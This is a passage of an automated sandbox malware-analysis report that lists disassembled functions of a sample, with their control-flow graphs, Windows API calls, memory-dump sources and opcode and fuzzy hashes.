                                                                                                                                                                    control_flow_graph 184 d9ff89-d9ff8e 185 d9ff90-d9ffa8 184->185 186 d9ffaa-d9ffae 185->186 187 d9ffb6-d9ffbf 185->187 186->187 188 d9ffb0-d9ffb4 186->188 189 d9ffd1 187->189 190 d9ffc1-d9ffc4 187->190 192 da002b-da002f 188->192 191 d9ffd3-d9ffe0 GetStdHandle 189->191 193 d9ffcd-d9ffcf 190->193 194 d9ffc6-d9ffcb 190->194 195 da000d-da001f 191->195 196 d9ffe2-d9ffe4 191->196 192->185 197 da0035-da0038 192->197 193->191 194->191 195->192 199 da0021-da0024 195->199 196->195 198 d9ffe6-d9ffef GetFileType 196->198 198->195 200 d9fff1-d9fffa 198->200 199->192 201 d9fffc-da0000 200->201 202 da0002-da0005 200->202 201->192 202->192 203 da0007-da000b 202->203 203->192
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00D9FE78,00DB4948), ref: 00D9FFD5
                                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00D9FE78,00DB4948), ref: 00D9FFE7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                    • Opcode ID: e4c769465b22e1dce0c022c36a1979b5bcb68ab4e4f3cc7ecae29e12305793be
                                                                                                                                                                    • Instruction ID: fcae1627d23b4fbdd6a3d461a3a1f5f48b4bedb29e303d04aead0844cdde6c1a
                                                                                                                                                                    • Opcode Fuzzy Hash: e4c769465b22e1dce0c022c36a1979b5bcb68ab4e4f3cc7ecae29e12305793be
                                                                                                                                                                    • Instruction Fuzzy Hash: 1711AF71604B518ACB304E3E9C88722BE95AB57335B3C072AD2F6C66F1C230D98AD675
                                                                                                                                                                    Function 00D9136E Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 204 d9136e-d913b1 call d9ce80 call d9197e 209 d914c9-d914ce 204->209 210 d913b7-d913fa 204->210 213 d914f0-d91532 call d91ab6 call d91a10 call d929c6 209->213 211 d913fc-d91404 210->211 212 d9144e-d91463 call d9408b 210->212 211->212 214 d91406-d91409 211->214 218 d91466-d9147b 212->218 216 d9140d-d91425 call d919d8 214->216 228 d9142b-d91442 216->228 229 d914d0-d914d5 216->229 221 d9147d-d91485 218->221 222 d914c0-d914c7 218->222 221->222 226 d91487-d91489 221->226 223 d914e0-d914ec 222->223 223->213 227 d9148a-d914a5 call d919d8 226->227 235 d914d7-d914dc 227->235 236 d914a7-d914be 227->236 228->216 232 d91444-d9144c 228->232 229->223 232->212 235->223 236->222 236->227
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                    • Opcode ID: cdb0a5e5c2042df226b4ce344c07907f8481b5913b2578a4cd348fc816baeba8
                                                                                                                                                                    • Instruction ID: e9bef56697e44ead39b99844133029c82084084222cb5eba1f103de3fe0d1227
                                                                                                                                                                    • Opcode Fuzzy Hash: cdb0a5e5c2042df226b4ce344c07907f8481b5913b2578a4cd348fc816baeba8
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B5191353042059FCB14DF6CC994B6A77D6EF88324F198668E969CB3D2D630ED05CB61
                                                                                                                                                                    Function 00D93C29 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 238 d93c29-d93c43 239 d93c4c-d93c54 238->239 240 d93c45-d93c47 238->240 242 d93c75-d93c79 239->242 243 d93c56-d93c60 239->243 241 d93d25-d93d32 call d929c6 240->241 246 d93c7f-d93c90 call d944b9 242->246 247 d93d21 242->247 243->242 248 d93c62-d93c73 243->248 254 d93c98-d93ccc 246->254 255 d93c92-d93c96 246->255 249 d93d24 247->249 252 d93cee-d93cf0 248->252 249->241 252->249 261 d93cce-d93cd1 254->261 262 d93cf2-d93cfa 254->262 256 d93cdf call d935da 255->256 259 d93ce4-d93ceb 256->259 259->252 261->262 263 d93cd3-d93cd7 261->263 264 d93cfc-d93d0d call d9c578 262->264 265 d93d0f-d93d1f 262->265 263->247 266 d93cd9-d93cdc 263->266 264->247 264->265 265->249 266->256
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 91f6c6d154d2aa63fe948350bd0a0f33e7c5985e9624916ab47621ff405d2675
                                                                                                                                                                    • Instruction ID: 3423a0377e47e462e81a00e137b298f0748c6914ba2a891fcedf3d7a40b37ceb
                                                                                                                                                                    • Opcode Fuzzy Hash: 91f6c6d154d2aa63fe948350bd0a0f33e7c5985e9624916ab47621ff405d2675
                                                                                                                                                                    • Instruction Fuzzy Hash: 8D31447260051AEFCF15DF68D8949EDB7B9FF09320B144265E512E7690DB31EA44CB70
                                                                                                                                                                    Function 00D93C1B Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 269 d93c1b-d93c20 270 d93c6e-d93c74 269->270 271 d93c22-d93c28 call d98773 269->271 273 d93bf9-d93c08 270->273 274 d93c76 270->274 276 d93c78-d93c80 274->276 277 d93cc4-d93ccc 274->277 279 d93cce-d93cd1 277->279 280 d93cf2-d93cfa 277->280 279->280 281 d93cd3-d93cd7 279->281 282 d93cfc-d93d0d call d9c578 280->282 283 d93d0f-d93d1f 280->283 284 d93cd9-d93cdf call d935da 281->284 285 d93d21 281->285 282->283 282->285 287 d93d24-d93d32 call d929c6 283->287 293 d93ce4-d93cf0 284->293 285->287 293->287
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLeaveSection
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3988221542-0
                                                                                                                                                                    • Opcode ID: efc8894ac086960bb12be442af5c7c0b57948e2317f12770bd353b9b72a405ee
                                                                                                                                                                    • Instruction ID: 1e879556f95700be68ec2634562f823018045dfecfd55713eac394fefdb6e33f
                                                                                                                                                                    • Opcode Fuzzy Hash: efc8894ac086960bb12be442af5c7c0b57948e2317f12770bd353b9b72a405ee
                                                                                                                                                                    • Instruction Fuzzy Hash: 180144367086166BCF059B78E9693A9BB60FF86338F24416FD0029A4C0CB229A20C630
                                                                                                                                                                    Function 00D9E531 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 296 d9e531-d9e53d 297 d9e56f-d9e57a call d9ad6d 296->297 298 d9e53f-d9e541 296->298 305 d9e57c-d9e57e 297->305 300 d9e55a-d9e56b RtlAllocateHeap 298->300 301 d9e543-d9e544 298->301 303 d9e56d 300->303 304 d9e546-d9e54d call d9b92d 300->304 301->300 303->305 304->297 308 d9e54f-d9e558 call d98f08 304->308 308->297 308->300
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00D931E1,00D9186A,?,00D960C1,00D9186C,00D9186A,?,?,?,00D93181,00D931E1,00D9186E,00D9186A,00D9186A,00D9186A), ref: 00D9E563
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: c209783cad9e61b630f58e8abeb6703645e4403e39264bd306c1a4897848178e
                                                                                                                                                                    • Instruction ID: 9733a32e3a28b0b467e3c24f97ecadad305112fdfe940af63a33591f1f3d9292
                                                                                                                                                                    • Opcode Fuzzy Hash: c209783cad9e61b630f58e8abeb6703645e4403e39264bd306c1a4897848178e
                                                                                                                                                                    • Instruction Fuzzy Hash: 73E0ED31901220AAEF60EAA9AC00B6A3B48EF01BB8F1B0221EC4597191FF60CD0086F0

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00DA3178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00DA2B49,00000002,00000000,?,?,?,00DA2B49,?,00000000), ref: 00DA3211
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00DA2B49,00000002,00000000,?,?,?,00DA2B49,?,00000000), ref: 00DA323A
                                                                                                                                                                    • GetACP.KERNEL32(?,?,00DA2B49,?,00000000), ref: 00DA324F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                    • Opcode ID: dc7b02bc7a504f091312e3e8e5fb95016b71851624fb01fb19e4e6789d61a4c3
                                                                                                                                                                    • Instruction ID: 4dbe900a0ce4a0417d15eaa410a928df5a243588c589a682a1a946832d031a1a
                                                                                                                                                                    • Opcode Fuzzy Hash: dc7b02bc7a504f091312e3e8e5fb95016b71851624fb01fb19e4e6789d61a4c3
                                                                                                                                                                    • Instruction Fuzzy Hash: F421AC32600200EADB348FA4D805BA7B7A7EF96F54B6A8525F90AD7210E732DF40D374
                                                                                                                                                                    Function 00DA2A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00DA2B1B
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00DA2B59
                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00DA2B6C
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00DA2BB4
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00DA2BCF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 415426439-0
                                                                                                                                                                    • Opcode ID: 1db41d8ced2c68efb93eb4824350707cc8e832f0d1b4fd71372b4f05a342c3b7
                                                                                                                                                                    • Instruction ID: 026f54ac38aac61291b61099152ba47e0bb7c807c13bd6ee2e1f96e6a0f64e50
                                                                                                                                                                    • Opcode Fuzzy Hash: 1db41d8ced2c68efb93eb4824350707cc8e832f0d1b4fd71372b4f05a342c3b7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E516D71A01215AFDF20DFAACC81ABE77B8EF16700F184569E910E7190EBB0DA44DB71
                                                                                                                                                                    Function 00DA375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DA384A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                    • Opcode ID: 2d14cef21292f10e5593b6ccf3bfa48eff40f7491a6616d560753801a45dd5ef
                                                                                                                                                                    • Instruction ID: d5687e0ffc7caa4e73635a7d3c740480b2f291e4ae22ccb610c7faae6ca46b13
                                                                                                                                                                    • Opcode Fuzzy Hash: 2d14cef21292f10e5593b6ccf3bfa48eff40f7491a6616d560753801a45dd5ef
                                                                                                                                                                    • Instruction Fuzzy Hash: 8771B5B1D05158AFDF20EF68DC9DAAAB7BAEB06300F1845D9F04993211DA358F849F30
                                                                                                                                                                    Function 00D95020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D9502C
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00D950F8
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D95111
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D9511B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                    • Opcode ID: 6f445ee5b5de75ed6dfbb2658318ada7b13dd4904521bde64863eaa225275a73
                                                                                                                                                                    • Instruction ID: a9c87d425dbed86d9336bc530b32134d90064b4263988bf675de06246cdbc428
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f445ee5b5de75ed6dfbb2658318ada7b13dd4904521bde64863eaa225275a73
                                                                                                                                                                    • Instruction Fuzzy Hash: 9431F975D05319DBDF21EF64D9497CDBBB8AF08300F1041AAE40DAB250EB719B858F55
                                                                                                                                                                    Function 00DA2CFF Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DA2D53
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DA2D9D
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00DA2E63
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 661929714-0
                                                                                                                                                                    • Opcode ID: a11d612c964ea9ad4adf1870d9248848bd514114de4db5e129752c186889793a
                                                                                                                                                                    • Instruction ID: 2cf574dc47e6441bf6814555367777630901d101ca8f0fe499c3d1095bfd3050
                                                                                                                                                                    • Opcode Fuzzy Hash: a11d612c964ea9ad4adf1870d9248848bd514114de4db5e129752c186889793a
                                                                                                                                                                    • Instruction Fuzzy Hash: 04617071910207DFDF289F2ACC82BBA77A9EF15301F1441AAF915C6685E778DA80DB70
                                                                                                                                                                    Function 00D9B4B9 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00D931E1), ref: 00D9B5B1
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00D931E1), ref: 00D9B5BB
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00D91542,?,?,?,?,?,00D931E1), ref: 00D9B5C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                    • Opcode ID: c18ba2bf37da6e124f6e7769b9b688a62a632d840b0356f68b5586b6a846edef
